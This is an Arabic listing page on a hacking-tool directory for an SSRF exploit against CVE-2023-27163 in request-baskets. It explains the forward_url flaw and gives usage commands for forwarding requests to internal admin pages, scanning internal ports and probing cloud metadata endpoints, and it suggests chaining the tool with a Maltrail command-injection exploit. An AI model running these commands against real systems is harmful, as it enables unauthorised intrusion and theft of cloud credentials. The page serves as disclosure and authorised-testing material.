Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-27163-exploit — استغلال SSRF لـ CVE-2023-27163 في request-baskets، يتيح فحص المنافذ الداخلية، واستكشاف بيانات التعريف السحابية، واكتشاف الخدمات عبر إعادة توجيه السلة الضارة. | Kitploit
أدوات/GitHubGitHub/jeanback1/cve-2023-27163-exploit
الاستطلاعمسح المنافذتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن السحابة
GitHubjeanback1/cve-2023-27163-exploit

CVE-2023-27163-exploit

استغلال SSRF لـ CVE-2023-27163 في request-baskets، يتيح فحص المنافذ الداخلية، واستكشاف بيانات التعريف السحابية، واكتشاف الخدمات عبر إعادة توجيه السلة الضارة.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-27163 — استغلال SSRF في request-baskets

لقد كتبت هذه الأداة لاستهداف CVE-2023-27163، وهي ثغرة تزوير طلبات من الخادم (SSRF) موجودة في إصدارات request-baskets ≤ 1.2.1. يقع الخلل في نقطة النهاية /api/baskets/{name}، حيث يسمح الباراميتر forward_url للمهاجم بجعل الخادم يصدر طلبات HTTP عشوائية نيابة عنه.

كيف يعمل

تقوم الأداة بإنشاء "سلة" خبيثة (basket) تم تكوينها باستخدام forward_url يشير إلى هدف داخلي. يتم توجيه أي طلب يتم إرساله إلى نقطة نهاية تلك السلة من قبل الخادم إلى عنوان URL المحدد، مما يحول الخادم فعليًا إلى وكيل SSRF.

المميزات

  • توجيه طلبات SSRF إلى أي عنوان URL داخلي أو خارجي
  • فحص المنافذ على المضيفين الداخليين عبر استقصاء HTTP
  • استقصاء نقاط نهاية بيانات السحابة (AWS, GCP, Azure, DigitalOcean, Alibaba)
  • اكتشاف الخدمات الداخلية الشائعة
  • إعدادات سلة قابلة للتخصيص (وكيل، TLS غير آمن، توسيع المسار)

المتطلبات

  • بايثون 3.6+
  • مكتبة requests (pip install requests)

الاستخدام

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-f FORWARD_URL] [--proxy-response]
                  [--insecure-tls] [--no-expand-path] [--capacity CAPACITY]
                  [--scan-host SCAN_HOST] [--ports PORTS] [--scan]
                  [--discover] [--cloud-metadata] [--timeout TIMEOUT]
                  [--delay DELAY]

أمثلة

root@kitploit:~
# Basic SSRF forward to an internal service
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80/admin

# Port scan an internal host
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 127.0.0.1 --scan

# Probe cloud metadata endpoints
python3 exploit.py -t http://192.168.1.100:55555 --cloud-metadata

# Proxy mode (returns the forwarded response body)
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80 --proxy-response

# Custom port range scan
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 10.0.0.2 \
         --ports 80,443,3000,5000,8000,8080,9000

إخلاء مسؤولية

لقد قمت ببناء هذه الأداة للأغراض التعليمية واختبار الأمان المصرح به فقط. لا تستخدمها ضد الأنظمة دون إذن صريح.


التكامل مع

يمكن استخدام هذا الاستغلال SSRF كنقطة دخول أولية للوصول إلى الخدمات الداخلية غير المكشوفة مباشرة. لقد صممته ليعمل جنبًا إلى جنب مع Maltrail-v0.53-Exploit — نفق SSRF يتيح لك الوصول إلى مثيل Maltrail يعمل على localhost وتشغيل حقن الأوامر من خلاله.

CVE-2023-27163-استغلال

تنزيل الأداة